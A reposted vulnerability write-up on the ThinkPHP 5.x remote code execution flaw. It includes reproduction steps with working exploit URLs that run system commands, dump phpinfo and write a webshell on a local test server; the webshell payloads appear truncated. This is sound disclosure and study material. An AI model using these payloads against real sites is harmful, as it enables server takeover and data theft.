Home > PHP Framework > ThinkPHP > thinkphp remote command execution vulnerability

thinkphp remote command execution vulnerability

Release: 2020-05-08 09:16:12
forward
4447 people have browsed it

thinkphp remote command execution vulnerability

Vulnerability Overview

ThinkPHP is a popular open source PHP framework in China. It was recently revealed that there is a possible remote code execution vulnerability. The attacker PHP code can be written to the cache file, leading to remote code execution.

Although the exploitation of this vulnerability requires several prerequisites, given the large number of domestic sites that use the ThinkPHP framework, this vulnerability still has a certain scope of impact. Because the framework does not perform enough detection on the controller name, it may lead to a possible getshell vulnerability when forced routing is not turned on.

Hazards of the vulnerability

An attacker can use this vulnerability to gain control of the website and modify the page, leading to data leakage and other problems.

Affected versions

5.x

Reproduction environment

thinkphp5.1 phpstudy integrated environment (php5.6n apache mysql)

Reproduction process

1. First set up the environment as shown in the figure

thinkphp remote command execution vulnerability

2. Use the system function to execute remote commands:

http://localhost/thinkphp5.1/html/public/index.php ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

thinkphp remote command execution vulnerability

3. Write phpinfo through the phpinfo function () Information:

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=1

thinkphp remote command execution vulnerability

4. Write shell:

http://localhost/thinkphp5.1/html /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ >shell.php

thinkphp remote command execution vulnerability

or

http://localhost/thinkphp5.1/html/public/index.php? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

Recommended tutorial: "TP5"

The above is the detailed content of thinkphp remote command execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:csdn.net
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template